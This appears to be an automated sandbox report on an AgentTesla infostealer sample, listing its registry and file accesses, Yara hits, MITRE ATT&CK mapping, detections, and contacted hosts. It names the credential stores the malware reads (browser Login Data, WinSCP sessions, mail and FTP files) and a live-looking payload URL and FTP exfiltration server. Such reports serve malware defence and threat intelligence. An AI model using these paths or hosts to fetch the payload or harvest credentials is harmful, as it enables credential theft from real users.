                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeQueries volume information: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeQueries volume information: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.2.Teklif-6205018797-6100052155-UUE.exe.35d4a70.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.InstallUtil.exe.360000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Teklif-6205018797-6100052155-UUE.exe.35d4a70.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.2532866894.0000000002B2A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2224473393.00000000035BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2532815910.0000000002D9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2206832205.00000000028BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2444038215.0000000000362000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2477328871.000000000407C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2448653484.000000000263E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2532815910.0000000002DDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2446673623.0000000003264000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2558909751.0000000003A4B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3319267989.0000000002C1E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3319267989.0000000002C07000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2448653484.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2224473393.000000000366C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Teklif-6205018797-6100052155-UUE.exe PID: 3060, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6972, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Ptqlzgvzpfa.exe PID: 1120, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Ptqlzgvzpfa.exe PID: 2928, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6020, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5488, type: MEMORYSTR
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Tries to harvest and steal ftp login credentials
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\FTP Navigator\Ftplist.txt
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: Yara matchFile source: 0.2.Teklif-6205018797-6100052155-UUE.exe.35d4a70.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.InstallUtil.exe.360000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Teklif-6205018797-6100052155-UUE.exe.35d4a70.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.2532866894.0000000002B2A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2224473393.00000000035BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2532815910.0000000002D9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2206832205.00000000028BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2444038215.0000000000362000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2477328871.000000000407C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2446673623.0000000003264000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2558909751.0000000003A4B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2448653484.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2224473393.000000000366C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Teklif-6205018797-6100052155-UUE.exe PID: 3060, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6972, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Ptqlzgvzpfa.exe PID: 1120, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Ptqlzgvzpfa.exe PID: 2928, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6020, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5488, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.2.Teklif-6205018797-6100052155-UUE.exe.35d4a70.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.InstallUtil.exe.360000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Teklif-6205018797-6100052155-UUE.exe.35d4a70.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.2532866894.0000000002B2A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2224473393.00000000035BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2532815910.0000000002D9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2206832205.00000000028BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2444038215.0000000000362000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2477328871.000000000407C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2448653484.000000000263E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2532815910.0000000002DDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2446673623.0000000003264000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2558909751.0000000003A4B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3319267989.0000000002C1E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3319267989.0000000002C07000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2448653484.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2224473393.000000000366C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Teklif-6205018797-6100052155-UUE.exe PID: 3060, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6972, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Ptqlzgvzpfa.exe PID: 1120, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Ptqlzgvzpfa.exe PID: 2928, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6020, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5488, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		1
                      Disable or Modify Tools                      		2
                      OS Credential Dumping                      		1
                      File and Directory Discovery                      		Remote Services11
                      Archive Collected Data                      		1
                      Ingress Tool Transfer                      		1
                      Exfiltration Over Alternative Protocol                      		Abuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Scheduled Task/Job                      		1
                      Scheduled Task/Job                      		311
                      Process Injection                      		1
                      Deobfuscate/Decode Files or Information                      		1
                      Input Capture                      		24
                      System Information Discovery                      		Remote Desktop Protocol2
                      Data from Local System                      		11
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAt1
                      Registry Run Keys / Startup Folder                      		1
                      Scheduled Task/Job                      		2
                      Obfuscated Files or Information                      		1
                      Credentials in Registry                      		311
                      Security Software Discovery                      		SMB/Windows Admin Shares1
                      Email Collection                      		1
                      Non-Standard Port                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                      Registry Run Keys / Startup Folder                      		2
                      Software Packing                      		NTDS12
                      Virtualization/Sandbox Evasion                      		Distributed Component Object Model1
                      Input Capture                      		2
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading                      		LSA Secrets1
                      Process Discovery                      		SSHKeylogging13
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Masquerading                      		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                      Virtualization/Sandbox Evasion                      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job311
                      Process Injection                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1520406 Sample: Teklif-6205018797-610005215... Startdate: 27/09/2024 Architecture: WINDOWS Score: 100 30 wymascensores.com 2->30 32 ftp.alternatifplastik.com 2->32 34 50.23.12.20.in-addr.arpa 2->34 48 Suricata IDS alerts for network traffic 2->48 50 Found malware configuration 2->50 52 Malicious sample detected (through community Yara rule) 2->52 54 10 other signatures 2->54 7 Teklif-6205018797-6100052155-UUE.exe 16 4 2->7         started        12 Ptqlzgvzpfa.exe 14 2 2->12         started        14 Ptqlzgvzpfa.exe 2 2->14         started        signatures3 process4 dnsIp5 36 wymascensores.com 67.212.175.162, 443, 49704, 52073 SINGLEHOP-LLCUS United States 7->36 24 C:\Users\user\AppData\...\Ptqlzgvzpfa.exe, PE32 7->24 dropped 26 C:\Users\...\Ptqlzgvzpfa.exe:Zone.Identifier, ASCII 7->26 dropped 56 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 7->56 58 Writes to foreign memory regions 7->58 60 Allocates memory in foreign processes 7->60 16 InstallUtil.exe 14 2 7->16         started        62 Multi AV Scanner detection for dropped file 12->62 64 Machine Learning detection for dropped file 12->64 66 Injects a PE file into a foreign processes 12->66 20 InstallUtil.exe 12->20         started        22 InstallUtil.exe 14->22         started        file6 signatures7 process8 dnsIp9 28 ftp.alternatifplastik.com 5.2.84.236, 21, 49705, 49708 ALASTYRTR Turkey 16->28 38 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 16->38 40 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 22->40 42 Tries to steal Mail credentials (via file / registry access) 22->42 44 Tries to harvest and steal ftp login credentials 22->44 46 Tries to harvest and steal browser information (history, passwords, etc) 22->46 signatures10

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      Teklif-6205018797-6100052155-UUE.exe50%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                      Teklif-6205018797-6100052155-UUE.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe50%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://stackoverflow.com/q/14436606/233540%URL Reputationsafe
                      https://account.dyn.com/0%URL Reputationsafe
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                      https://stackoverflow.com/q/11564914/23354;0%URL Reputationsafe
                      https://stackoverflow.com/q/2152978/233540%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      wymascensores.com
                      		67.212.175.162
                      		truetrue
                        		unknown
                        ftp.alternatifplastik.com
                        		5.2.84.236
                        		truetrue
                          		unknown
                          50.23.12.20.in-addr.arpa
                          		unknown
                          		unknownfalse
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            https://wymascensores.com/img/Tcghz.wavtrue
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://github.com/mgravell/protobuf-netTeklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2231386513.00000000058D0000.00000004.08000000.00040000.00000000.sdmp, Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.0000000003F03000.00000004.00000800.00020000.00000000.sdmp, Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.00000000036D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                		unknown
                                https://github.com/mgravell/protobuf-netiTeklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2231386513.00000000058D0000.00000004.08000000.00040000.00000000.sdmp, Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.0000000003F03000.00000004.00000800.00020000.00000000.sdmp, Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.00000000036D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://stackoverflow.com/q/14436606/23354Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2231386513.00000000058D0000.00000004.08000000.00040000.00000000.sdmp, Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.0000000003F03000.00000004.00000800.00020000.00000000.sdmp, Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.00000000036D9000.00000004.00000800.00020000.00000000.sdmp, Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2206832205.0000000002538000.00000004.00000800.00020000.00000000.sdmp, Ptqlzgvzpfa.exe, 00000004.00000002.2446673623.0000000002F47000.00000004.00000800.00020000.00000000.sdmp, Ptqlzgvzpfa.exe, 00000005.00000002.2532866894.0000000002918000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://account.dyn.com/Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.00000000035BF000.00000004.00000800.00020000.00000000.sdmp, Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2206832205.00000000028BE000.00000004.00000800.00020000.00000000.sdmp, Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.000000000366C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2444038215.0000000000362000.00000040.00000400.00020000.00000000.sdmp, Ptqlzgvzpfa.exe, 00000004.00000002.2477328871.000000000407C000.00000004.00000800.00020000.00000000.sdmp, Ptqlzgvzpfa.exe, 00000004.00000002.2446673623.0000000003264000.00000004.00000800.00020000.00000000.sdmp, Ptqlzgvzpfa.exe, 00000005.00000002.2532866894.0000000002B2A000.00000004.00000800.00020000.00000000.sdmp, Ptqlzgvzpfa.exe, 00000005.00000002.2558909751.0000000003A4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://github.com/mgravell/protobuf-netJTeklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2231386513.00000000058D0000.00000004.08000000.00040000.00000000.sdmp, Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.0000000003F03000.00000004.00000800.00020000.00000000.sdmp, Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.00000000036D9000.00000004.00000800.00020000.00000000.sdmp, Ptqlzgvzpfa.exe, 00000004.00000002.2477328871.0000000004959000.00000004.00000800.00020000.00000000.sdmp, Ptqlzgvzpfa.exe, 00000005.00000002.2558909751.0000000004329000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://wymascensores.comTeklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2206832205.00000000024F1000.00000004.00000800.00020000.00000000.sdmp, Ptqlzgvzpfa.exe, 00000004.00000002.2446673623.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, Ptqlzgvzpfa.exe, 00000005.00000002.2532866894.00000000028DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameTeklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2206832205.00000000024F1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2448653484.000000000263E000.00000004.00000800.00020000.00000000.sdmp, Ptqlzgvzpfa.exe, 00000004.00000002.2446673623.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, Ptqlzgvzpfa.exe, 00000005.00000002.2532866894.00000000028DC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2532815910.0000000002DDE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3319267989.0000000002C1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://stackoverflow.com/q/11564914/23354;Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2231386513.00000000058D0000.00000004.08000000.00040000.00000000.sdmp, Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.0000000003F03000.00000004.00000800.00020000.00000000.sdmp, Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.00000000036D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://stackoverflow.com/q/2152978/23354Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2231386513.00000000058D0000.00000004.08000000.00040000.00000000.sdmp, Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.0000000003F03000.00000004.00000800.00020000.00000000.sdmp, Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.00000000036D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://wymascensores.com/img/Tcghz.wav7__AsyncLocalScope_Current__Teklif-6205018797-6100052155-UUE.exe, Ptqlzgvzpfa.exe.0.drfalse
                                        		unknown
                                        http://ftp.alternatifplastik.comInstallUtil.exe, 00000002.00000002.2448653484.000000000264C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2448653484.000000000263E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2532815910.0000000002DEC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2532815910.0000000002DDE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3319267989.0000000002C2C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3319267989.0000000002C1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown

                                          World Map of Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public IPs

                                          IPDomainCountryFlagASNASN NameMalicious
                                          67.212.175.162
                                          		wymascensores.comUnited States
                                          		32475SINGLEHOP-LLCUStrue
                                          5.2.84.236
                                          		ftp.alternatifplastik.comTurkey
                                          		3188ALASTYRTRtrue

